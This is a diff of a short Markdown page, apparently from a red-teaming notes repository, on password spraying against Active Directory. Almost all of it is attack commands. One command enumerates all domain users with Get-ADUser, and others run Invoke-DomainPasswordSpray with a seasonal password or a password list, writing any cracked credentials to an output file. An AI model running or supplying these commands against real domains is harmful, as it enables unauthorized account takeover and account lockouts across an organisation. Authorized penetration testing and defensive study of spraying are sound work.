H3llKa1ser/B00t2R00t/Red Teaming/Password Attacks/Password Spray Attack.md

 #### 2) Using DomainPasswordSpray to spray a password against all users of a domain https://github.com/dafthack/DomainPasswordSpray

+Create a userlist

+    Get-ADUser -Properties name -Filter * | Select-Object -ExpandProperty name | Out-File users.txt

+Use Invoke-DomainPasswordSpray

-    Invoke-DomainPasswordSpray -Password Summer2021!
-(Automatically creates a userlist from the users in the domain and sprays the password)
+    Invoke-DomainPasswordSpray -Password Summer2021! -Verbose (Automatically creates a userlist from the users in the domain and sprays the password)

     Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt